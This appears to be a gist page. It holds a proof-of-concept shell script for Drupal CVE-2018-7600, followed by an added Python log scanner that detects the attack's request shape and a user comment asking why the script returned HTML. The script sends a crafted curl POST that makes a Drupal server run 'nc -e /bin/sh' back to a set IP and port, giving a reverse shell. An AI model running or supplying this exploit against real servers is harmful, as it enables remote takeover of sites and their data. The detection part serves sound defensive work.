Drupal CVE-2018-7600 PoC - reverse netcat shell ;)
#!/bin/sh
YOUR_EXTERNAL_IP="172.16.30.108"
YOUR_NETCAT_PORT="6969"
# Start up a netcat server
# netcat -l 6969
HOST="http://drupal.docker.localhost:8000"
PHP_FUNCTION="exec"
PHP_ARG="nohup nc $YOUR_EXTERNAL_IP $YOUR_NETCAT_PORT -e /bin/sh"
curl -X POST \
"$HOST/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" \
-F form_id=user_register_form \
-F _drupal_ajax=1 \
-F "mail[#post_render][]=$PHP_FUNCTION" \
-F 'mail[#type]=markup' \
-F "mail[#markup]=$PHP_ARG"
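
A defender-side check for the request shape this script sends, as an added example that is not part of the original gist: it flags access-log entries whose query string carries `#`-prefixed keys (here inside `element_parents`) and form field names such as `mail[#post_render][]`. The log lines are constructed samples and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Apr/2018:10:01:02 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 412 "-" "curl/7.58.0"',
    '198.51.100.4 - - [13/Apr/2018:10:02:11 +0000] "GET /user/register HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [13/Apr/2018:10:03:40 +0000] "POST /user/register?element_parents=account/mail&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 301 "-" "Mozilla/5.0"',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
BRACKET_KEY_RE = re.compile(r'\[([^\]]*)\]')


def hash_keys_in_name(name):
    """Return the '#'-prefixed keys in a field name such as mail[#type]."""
    keys = [name.split('[', 1)[0]] + BRACKET_KEY_RE.findall(name)
    return [k for k in keys if k.startswith('#')]


def suspicious_query(target):
    """Return the reasons a request target carries '#'-prefixed keys."""
    reasons = []
    # parse_qsl percent-decodes, so %23value is compared as #value.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        reasons += [f"parameter key {k!r}" for k in hash_keys_in_name(name)]
        if name == 'element_parents':
            reasons += [f"element_parents segment {s!r}"
                        for s in value.split('/') if s.startswith('#')]
    return reasons


def scan(lines):
    """Return (client_ip, target, reasons) for each flagged log line."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        reasons = suspicious_query(match.group('target'))
        if reasons:
            hits.append((line.split(' ', 1)[0], match.group('target'), reasons))
    return hits


if __name__ == '__main__':
    for ip, target, reasons in scan(SAMPLE_LOG):
        print(ip, target, '; '.join(reasons))
```

Access logs normally record only the URL, so `hash_keys_in_name` is meant for wherever body field names are visible, such as a reverse proxy or WAF rule.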

xuxuedong commented Apr 13, 2018

Please, why did I receive some HTML code when I executed the above shell script? I was using XAMPP on Kali, Drupal 8.5.0.
